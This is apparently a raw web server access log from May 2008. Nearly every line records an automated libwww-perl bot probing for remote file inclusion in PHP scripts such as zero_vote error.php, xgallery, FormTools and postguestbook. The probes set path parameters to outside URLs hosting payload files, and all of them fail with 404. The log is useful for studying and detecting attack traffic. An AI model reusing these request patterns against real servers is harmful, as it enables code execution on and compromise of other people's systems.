208.112.43.2 - - [04/May/2008:20:23:41 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
69.61.37.254 - - [04/May/2008:20:23:49 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:20:23:50 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:20:24:19 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.65"
85.19.150.85 - - [04/May/2008:20:24:53 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:24:53 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:24:54 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:20:24:58 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:20:24:58 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:20:24:58 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:24:59 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:25:11 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:25:16 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:20:25:21 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:20:25:24 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:20:25:37 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
59.106.19.213 - - [04/May/2008:20:25:39 -0600] "GET /logs/access_log.20080420//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
59.106.19.213 - - [04/May/2008:20:25:39 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
59.106.19.213 - - [04/May/2008:20:25:40 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:20:25:41 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:25:41 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
213.149.32.24 - - [04/May/2008:20:25:46 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:25:54 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
59.106.19.213 - - [04/May/2008:20:26:28 -0600] "GET /logs/error_log.20080420//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:27:00 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:27:00 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:27:00 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:20:27:12 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:20:27:14 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
85.19.150.85 - - [04/May/2008:20:27:45 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:27:59 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
211.115.213.123 - - [04/May/2008:20:28:02 -0600] "GET /logs/error_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:02 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.149.32.24 - - [04/May/2008:20:28:03 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
211.115.213.123 - - [04/May/2008:20:28:03 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:13 -0600] "GET /logs/access_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:33 -0600] "GET /logs/error_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:33 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:34 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:44 -0600] "GET /logs/access_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:48 -0600] "GET /logs/error_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:48 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:49 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:54 -0600] "GET /logs/error_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
91.197.231.29 - - [04/May/2008:20:28:55 -0600] "GET //skin/zero_vote/error.php?dir=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 231 "-" "libwww-perl/5.812"
211.115.213.123 - - [04/May/2008:20:28:55 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:55 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:28:58 -0600] "GET /logs/access_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
211.115.213.123 - - [04/May/2008:20:29:05 -0600] "GET /logs/access_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
69.64.33.211 - - [04/May/2008:20:30:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:20:30:10 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
217.198.149.178 - - [04/May/2008:20:31:36 -0600] "GET //skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
69.64.33.211 - - [04/May/2008:20:32:46 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:20:32:46 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.227.145.193 - - [04/May/2008:20:32:50 -0600] "GET //skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
216.6.180.69 - - [04/May/2008:20:36:03 -0600] "GET /logs/access_log.20080413/scanhttp://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:03 -0600] "GET /scanhttp://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:03 -0600] "GET /logs/scanhttp://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:04 -0600] "GET /logs/access_log.20080420/scanhttp://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
195.12.53.176 - - [04/May/2008:20:36:35 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:20:36:35 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:36:35 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:36:35 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
195.12.53.176 - - [04/May/2008:20:36:36 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:36:36 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
216.6.180.69 - - [04/May/2008:20:36:41 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:41 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:41 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:36:43 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:36:48 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
195.12.53.176 - - [04/May/2008:20:36:52 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:36:52 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:36:53 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
67.121.157.153 - - [04/May/2008:20:38:10 -0600] "GET //skin/zero_vote/error.php?dir=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:38:20 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:38:35 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:20:39:11 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:11 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:11 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:16 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:16 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:16 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:23 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:23 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:23 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:27 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:27 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:27 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:32 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:32 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:32 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:35 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:35 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:39:35 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:41 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:48 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:39:56 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
216.246.0.122 - - [04/May/2008:20:40:05 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
216.246.0.122 - - [04/May/2008:20:40:06 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
216.6.180.69 - - [04/May/2008:20:40:10 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:40:18 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:40:23 -0600] "GET /logs/error_log.20080330//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:40:23 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:40:23 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:40:25 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
91.197.231.29 - - [04/May/2008:20:40:27 -0600] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
91.197.231.29 - - [04/May/2008:20:40:27 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 236 "-" "libwww-perl/5.812"
91.197.231.29 - - [04/May/2008:20:40:43 -0600] "GET /logs/access_log.20080427//skin/zero_vote/error.php?dir=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 256 "-" "libwww-perl/5.812"
72.32.68.172 - - [04/May/2008:20:40:53 -0600] "GET /logs/access_log.20080330//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:40:59 -0600] "GET /logs/error_log.20080330//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:40:59 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:41:00 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:41:34 -0600] "GET /logs/access_log.20080330//templates/mangobery/footer.sample.php?Site_Path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
85.227.145.193 - - [04/May/2008:20:43:25 -0600] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
85.227.145.193 - - [04/May/2008:20:43:26 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.76"
85.227.145.193 - - [04/May/2008:20:43:32 -0600] "GET /logs/access_log.20080413//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.76"
208.112.43.2 - - [04/May/2008:20:43:46 -0600] "GET /logs/access_log.20080413/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:20:43:46 -0600] "GET /myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:20:43:46 -0600] "GET /logs/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
217.198.149.178 - - [04/May/2008:20:44:10 -0600] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
217.198.149.178 - - [04/May/2008:20:44:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
217.198.149.178 - - [04/May/2008:20:44:13 -0600] "GET /logs/access_log.20080413//skin/zero_vote/error.php?dir=http://dnpractice.com/img/wiki/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
208.112.43.2 - - [04/May/2008:20:44:26 -0600] "GET /logs/access_log.20080406/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
213.149.32.24 - - [04/May/2008:20:44:38 -0600] "GET /logs/access_log.20080413/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:20:44:38 -0600] "GET /myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:20:44:39 -0600] "GET /logs/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.54.9.218 - - [04/May/2008:20:44:43 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
195.54.9.218 - - [04/May/2008:20:44:43 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
